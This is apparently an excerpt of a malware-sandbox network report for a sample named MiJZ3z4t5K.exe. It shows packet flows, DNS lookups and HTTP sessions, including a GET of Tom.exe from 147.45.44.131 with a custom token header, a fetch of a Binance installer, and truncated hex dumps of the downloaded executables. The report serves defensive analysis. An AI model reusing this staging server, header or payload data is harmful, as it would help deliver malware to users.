Dec 5, 2024 11:40:01.668631077 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.670480013 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.670500040 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.670525074 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.672327995 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.672341108 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.672374964 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.674233913 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.674247980 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.674280882 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.676183939 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.676198006 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.676211119 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.676233053 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.676260948 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.678133011 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.678149939 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.678205967 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.680015087 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.680037975 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.680087090 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.681912899 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.681932926 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.681976080 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.683887005 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.683902025 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.683952093 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.685813904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.685836077 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.685847998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.685885906 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.687697887 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.687720060 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.687751055 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.691632986 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.691695929 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.693537951 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.693551064 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.693593979 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.695466995 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.695480108 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.695492029 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.695522070 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.740895033 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.794329882 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.794884920 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.794946909 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.795746088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.795766115 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.795806885 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.797491074 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.798405886 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.798419952 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.798465967 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.799784899 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.799798012 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.799844027 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.801548958 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.801568031 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.801594973 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.803260088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.803272009 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.803311110 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.805011988 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.805027008 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.805066109 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.806739092 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.806751966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.806796074 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.808635950 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.808691978 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.810408115 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.810420990 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.810432911 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.810461044 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.812320948 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.812334061 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.812376976 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.814327002 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.814380884 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.816318989 CET	80	49708	147.45.44.131	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 11:40:16.022418976 CET	192.168.2.6	1.1.1.1	0xe3b0	Standard query (0)	download.binance.com	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:41:24.140523911 CET	192.168.2.6	1.1.1.1	0x5cc4	Standard query (0)	amenstilo.website	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 11:40:16.251424074 CET	1.1.1.1	192.168.2.6	0xe3b0	No error (0)	download.binance.com		52.222.214.90	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:40:16.251424074 CET	1.1.1.1	192.168.2.6	0xe3b0	No error (0)	download.binance.com		52.222.214.53	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:40:16.251424074 CET	1.1.1.1	192.168.2.6	0xe3b0	No error (0)	download.binance.com		52.222.214.126	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:40:16.251424074 CET	1.1.1.1	192.168.2.6	0xe3b0	No error (0)	download.binance.com		52.222.214.79	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:41:24.369261026 CET	1.1.1.1	192.168.2.6	0x5cc4	Name error (3)	amenstilo.website	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49708	147.45.44.131	80	4824	C:\Users\user\Desktop\MiJZ3z4t5K.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 11:39:58.126005888 CET	179	OUT	GET /infopage/Tom.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
Dec 5, 2024 11:39:59.297185898 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 10:39:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 28 Nov 2024 17:38:25 GMT ETag: "a409ed-627fc8caf54eb" Accept-Ranges: bytes Content-Length: 10750445 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 21 11 53 05 40 7f 00 05 40 7f 00 05 40 7f 00 b1 dc 8e 00 0c 40 7f 00 b1 dc 8c 00 79 40 7f 00 b1 dc 8d 00 1d 40 7f 00 dc 22 7c 01 16 40 7f 00 dc 22 7b 01 16 40 7f 00 dc 22 7a 01 23 40 7f 00 0c 38 fc 00 00 40 7f 00 0c 38 ec 00 14 40 7f 00 05 40 7e 00 50 41 7f 00 a1 23 7a 01 4e 40 7f 00 a1 23 80 00 04 40 7f 00 05 40 e8 00 07 40 7f 00 a1 23 7d 01 04 40 7f 00 52 69 63 68 05 40 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 86 ad 10 5a 00 00 00 00 00 00 00 00 e0 00 02 0d 0b 01 0e 0b 00 9a 04 00 00 74 02 00 00 00 00 00 a6 e2 02 00 00 10 00 00 00 b0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A!S@@@@y@@"\|@"{@"z#@8@8@@~PA#zN@#@@@#}@Rich@PELZt@P@:=PvTv0p@4.text7 `.rdata`@@.data0@.wixburn8@@.rsrc:<@@.reloc=>@B
Dec 5, 2024 11:39:59.396173954 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: D8FD@F DXFDDFDHFD<FDLFDPF\|DTFTDFU0F3ES]3VuWPE
Dec 5, 2024 11:39:59.396188974 CET	1236	IN	Data Raw: 26 00 00 8b f0 85 f6 78 34 8b 45 0c eb 15 56 50 ff 37 e8 68 26 00 00 eb 0a 6a 01 50 e8 bd 24 00 00 33 f6 85 c0 75 14 be 0e 00 07 80 56 6a 6d 68 a0 b5 44 00 e8 77 23 00 00 eb 02 89 07 5f 8b c6 5e 5d c2 0c 00 55 8b ec 8b 45 08 53 56 33 f6 83 cb ff Data Ascii: &x4EVP7h&jP$3uVjmhDw#_^]UESV390t0';uW[W}uuDO;r%;r1;suS]S&x]hjjWuV3_^[]UfEj0Yf;wf9w*jaYf;wffw,
Dec 5, 2024 11:39:59.438129902 CET	1236	IN	Data Raw: 97 df 02 00 83 c4 0c e9 5a ff ff ff 55 8b ec 51 51 8b 55 20 b9 ff ff ff 7f 53 56 8b c2 33 f6 25 00 01 00 00 bb 57 00 07 80 57 8b 7d 0c 89 45 f8 74 13 8b 45 08 85 c0 75 04 85 ff 75 04 3b f9 76 13 8b f3 eb 0f 33 f6 85 ff 74 04 3b f9 76 02 8b f3 8b Data Ascii: ZUQQU SV3%WW}EtEuu;v3t;vEE]9MrW}MtueD3tW~u#9u9#WWu!uQMQWPME
Dec 5, 2024 11:39:59.438143969 CET	496	IN	Data Raw: 00 00 c6 00 00 eb df 8b 4d 18 8b 55 14 85 ff 74 0e a9 00 08 00 00 74 07 89 1a 89 39 c6 03 00 5f 33 c0 5b 5d c2 18 00 55 8b ec 8b 45 0c 56 8b f0 85 c0 74 0e 8b 4d 08 80 39 00 74 06 41 83 e8 01 75 f5 8b 55 10 8b c8 f7 d9 1b c9 81 e1 a9 ff f8 7f 85 Data Ascii: MUtt9_3[]UEVtM9tAuUtt+2"W^]UEVW3tMf99tuUtt+2:_W^]Ujuu\]Ujuuu]Ujuuu
Dec 5, 2024 11:39:59.467051029 CET	1236	IN	Data Raw: ff ff ff 7f ff 75 08 e8 a5 fc ff ff 8b f0 85 f6 78 64 53 8b 5d fc f6 c3 01 74 07 be 57 00 07 80 eb 53 57 6a 01 d1 eb 53 e8 19 19 00 00 8b f8 85 ff 75 17 be 0e 00 07 80 56 68 f1 05 00 00 68 a0 b5 44 00 e8 d0 17 00 00 eb 2a 53 57 ff 75 08 e8 13 06 Data Ascii: uxdS]tWSWjSuVhhD*SWuxE83EttW_[^]US]VuWj<uWSxW3Vu)_^[]UQSVu3!]W39t06uWEPh6
Dec 5, 2024 11:39:59.515882969 CET	224	IN	Data Raw: 18 74 09 ff 30 e8 09 16 00 00 eb 05 e8 61 14 00 00 85 c0 75 0d bb 0e 00 07 80 53 68 d7 01 00 00 eb 9f 8b 4d 08 89 01 eb 03 8b 4d 08 8b 45 10 85 c0 75 03 83 c8 ff 53 53 56 ff 31 50 ff 75 0c 53 ff 75 14 ff 15 0c b1 44 00 85 c0 75 29 ff 15 f4 b0 44 Data Ascii: t0auShMMEuSSV1PuSuDu)D~x@ShKE_^[]UESW398t0W;uWVVuuuDN;r%;r.;sS]S\
Dec 5, 2024 11:39:59.515898943 CET	1236	IN	Data Raw: fd ff ff 85 c0 78 1a eb 03 8b 5d 08 68 00 02 00 00 6a 00 6a 00 56 ff 75 0c 57 ff 33 e8 73 f3 ff ff 5e 5f 5b 5d c2 0c 00 55 8b ec 56 57 8b 7d 0c 8b 0f 8d 51 01 3b d1 72 04 8b f2 eb 03 83 ce ff 3b d1 1b c0 25 16 02 07 80 3b d1 72 2d 53 8b 5d 08 6a Data Ascii: x]hjjVuW3s^_[]UVW}Q;r;%;r-S]jjVSXxuuPex7[_^]UV3W}9uv<t4xF;urW_^]US]VWSD9}szVhhD43t.uP
Dec 5, 2024 11:39:59.515911102 CET	1236	IN	Data Raw: 80 eb 05 be 57 00 07 80 5f 8b c6 5e 5b 8b e5 5d c2 0c 00 b8 08 aa 46 00 c3 55 8b ec ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 e3 ff ff ff 8b 08 ff 70 04 83 c9 01 51 e8 5f 11 03 00 83 c4 1c 85 c0 79 03 83 c8 ff 5d c3 55 8b ec ff 75 18 ff 75 Data Ascii: W_^[]FUuuuuupQ_y]UuuuuupQRy]UQQeEeVuP6$x4EPu6~x EWj\_f;\|A_tjhDV^]US]3VE
Dec 5, 2024 11:39:59.517532110 CET	1236	IN	Data Raw: ff 68 a8 b7 44 00 50 e8 a2 ef ff ff 8b f0 83 c4 30 85 f6 0f 88 9b 00 00 00 6a 00 68 80 00 00 00 6a 01 6a 00 6a 01 68 00 00 00 40 ff b5 dc fd ff ff ff 15 e4 b0 44 00 8b f8 83 ff ff 75 49 ff 15 f4 b0 44 00 8b f0 83 fe 50 74 05 83 fe 05 75 18 6a 64 Data Ascii: hDP0jhjjjh@DuIDPtujdDs33@~xAtjPxt8tWDt%t%t
Dec 5, 2024 11:39:59.524414062 CET	1236	IN	Data Raw: 8b 55 08 83 c9 ff 56 57 8b f2 0f b7 3a 66 85 ff 74 61 53 8b c7 33 db c7 45 08 5c 00 00 00 66 39 45 08 74 21 c7 45 08 2f 00 00 00 66 39 45 08 74 14 c7 45 08 3a 00 00 00 66 39 45 08 75 0c 8d 42 02 3b f0 75 05 8b cb d1 f9 41 83 c6 02 83 c3 02 0f b7 Data Ascii: UVW:ftaS3E\f9Et!E/f9EtE:f9EuB;uAfu[t"uIQRu3@_^]UVuhVx63PPuPPDxV'^]UUV3f92tHSWf9qtE\f9]tE/f9]uf91u_

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49737	52.222.214.90	443	4824	C:\Users\user\Desktop\MiJZ3z4t5K.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 10:40:17 UTC	123	OUT	GET /electron-desktop/windows/production/binance-setup.exe HTTP/1.1 Host: download.binance.com Connection: Keep-Alive
2024-12-05 10:40:19 UTC	541	IN	HTTP/1.1 200 OK Content-Type: application/x-msdos-program Content-Length: 222455904 Connection: close Date: Thu, 05 Dec 2024 10:40:19 GMT Last-Modified: Thu, 05 Dec 2024 06:50:55 GMT ETag: "68542d2e17121188e4c4bc83a699439a-27" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 X-Cache: Miss from cloudfront Via: 1.1 bafba29f1325f15932567e0ae2d444a4.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: oal8qAtfl8TwyNWyMcFq23Pinu1xeVjFry4ot3PfPjUTcUvcfEW_Aw==
2024-12-05 10:40:19 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 86 7f 15 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 38 07 00 00 40 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf_9PfPgLPf_;PfsVPf.V`PfRichPfPEL\h8@
2024-12-05 10:40:19 UTC	603	IN	Data Raw: 09 68 0a 11 00 00 57 ff d6 83 7d 0c 00 74 3c ff 15 bc 81 40 00 0f bf c8 c1 e8 10 0f bf c0 89 45 f4 8d 45 f0 50 57 89 4d f0 ff 15 dc 81 40 00 8d 45 f0 50 6a 00 68 11 11 00 00 57 ff d6 f6 45 f8 66 75 05 83 c8 ff eb 1e 8b 45 fc 89 45 cc 8d 45 c8 50 6a 00 68 3e 11 00 00 57 c7 45 c8 04 00 00 00 ff d6 8b 45 ec 5f 5e c9 c2 08 00 56 57 be 00 b0 47 00 bf 48 02 45 00 56 57 e8 3b 16 00 00 ff 74 24 10 56 e8 78 15 00 00 ff 74 24 0c e8 79 c7 ff ff 57 56 e8 21 16 00 00 5f 5e c2 08 00 55 8b ec 83 ec 50 53 56 8b 35 e4 81 40 00 57 8b 7d 08 68 f9 03 00 00 57 ff d6 68 08 04 00 00 57 89 45 f8 ff d6 89 45 fc a1 28 af 47 00 8b 35 18 82 40 00 89 45 f0 a1 f4 ae 47 00 33 db 05 94 00 00 00 81 7d 0c 10 01 00 00 89 45 ec 0f 85 1b 02 00 00 a1 2c af 47 00 89 5d e4 c1 e0 02 50 6a 40 c7 Data Ascii: hW}t<@EEPWM@EPjhWEfuEEEPjh>WEE_^VWGHEVW;t$Vxt$yWV!_^UPSV5@W}hWhWEE(G5@EG3}E,G]Pj@
2024-12-05 10:40:19 UTC	16384	IN	Data Raw: 00 00 00 ff 75 fc ff d6 8b 0d 40 02 45 00 c7 45 e4 01 00 00 00 89 04 b9 a1 40 02 45 00 8b 1c b8 eb 2e a8 04 74 11 53 6a 03 68 0a 11 00 00 ff 75 fc ff d6 8b d8 eb 19 8d 45 b0 50 6a 00 68 32 11 00 00 ff 75 fc ff d6 8b 0d 40 02 45 00 89 04 b9 8b 55 e8 47 81 c2 18 40 00 00 3b 3d 2c af 47 00 89 55 e8 0f 8c 4a ff ff ff 83 7d e4 00 75 19 6a f0 ff 75 fc ff 15 ac 81 40 00 24 fb 50 6a f0 ff 75 fc ff 15 70 82 40 00 83 7d f4 00 75 18 6a 05 ff 75 f8 ff 15 68 82 40 00 ff 75 f8 e8 6a f3 ff ff e9 80 03 00 00 ff 75 fc e8 5d f3 ff ff 33 db 81 7d 0c 05 04 00 00 75 12 33 c9 89 5d 10 41 c7 45 0c 0f 04 00 00 89 4d 14 eb 03 8b 4d 14 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 e4 00 00 00 39 45 0c 89 4d f4 74 0d 81 79 04 08 04 00 00 0f 85 cf 00 00 00 f6 05 fd ae 47 00 02 75 Data Ascii: u@EE@E.tSjhuEPjh2u@EUG@;=,GUJ}uju@$Pjup@}ujuh@uju]3}u3]AEMM}Nt9E9EMtyGu
2024-12-05 10:40:20 UTC	1024	IN	Data Raw: 00 6c 00 65 00 72 00 20 00 69 00 6e 00 74 00 65 00 67 00 72 00 69 00 74 00 79 00 20 00 63 00 68 00 65 00 63 00 6b 00 20 00 68 00 61 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 2e 00 20 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 20 00 63 00 61 00 75 00 73 00 65 00 73 00 20 00 69 00 6e 00 63 00 6c 00 75 00 64 00 65 00 0a 00 69 00 6e 00 63 00 6f 00 6d 00 70 00 6c 00 65 00 74 00 65 00 20 00 64 00 6f 00 77 00 6e 00 6c 00 6f 00 61 00 64 00 20 00 61 00 6e 00 64 00 20 00 64 00 61 00 6d 00 61 00 67 00 65 00 64 00 20 00 6d 00 65 00 64 00 69 00 61 00 2e 00 20 00 43 00 6f 00 6e 00 74 00 61 00 63 00 74 00 20 00 74 00 68 00 65 00 0a 00 69 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 65 00 72 00 27 00 73 00 20 00 61 00 75 00 74 00 68 00 6f 00 72 00 20 00 74 00 6f 00 20 00 Data Ascii: ler integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to
2024-12-05 10:40:20 UTC	16384	IN	Data Raw: 69 6f 6e 49 6e 66 6f 57 00 47 65 74 46 69 6c 65 56 65 72 73 69 6f 6e 49 6e 66 6f 53 69 7a 65 57 00 56 45 52 53 49 4f 4e 00 53 48 47 65 74 46 6f 6c 64 65 72 50 61 74 68 57 00 00 00 00 53 48 46 4f 4c 44 45 52 00 00 00 00 53 48 41 75 74 6f 43 6f 6d 70 6c 65 74 65 00 00 53 48 4c 57 41 50 49 00 53 48 45 4c 4c 33 32 00 49 6e 69 74 69 61 74 65 53 68 75 74 64 6f 77 6e 57 00 00 00 52 65 67 44 65 6c 65 74 65 4b 65 79 45 78 57 00 41 44 56 41 50 49 33 32 00 00 00 00 47 65 74 55 73 65 72 44 65 66 61 75 6c 74 55 49 4c 61 6e 67 75 61 67 65 00 00 00 00 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 45 78 57 00 53 65 74 44 65 66 61 75 6c 74 44 6c 6c 44 69 72 65 63 74 6f 72 69 65 73 00 00 00 00 4b 45 52 4e 45 4c 33 32 00 00 00 00 5c 00 2a 00 2e 00 2a 00 00 00 00 00 6e 00 Data Ascii: ionInfoWGetFileVersionInfoSizeWVERSIONSHGetFolderPathWSHFOLDERSHAutoCompleteSHLWAPISHELL32InitiateShutdownWRegDeleteKeyExWADVAPI32GetUserDefaultUILanguageGetDiskFreeSpaceExWSetDefaultDllDirectoriesKERNEL32\.n
2024-12-05 10:40:20 UTC	1024	IN	Data Raw: ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e Data Ascii:
2024-12-05 10:40:20 UTC	16384	IN	Data Raw: ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e Data Ascii:
2024-12-05 10:40:20 UTC	1024	IN	Data Raw: ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 10 2a 31 ff 0c a6 d6 ff 0b b8 ef ff 0b b9 ef ff 0b a5 d5 ff 10 2a 30 ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e 0b ff 11 0e Data Ascii: 10
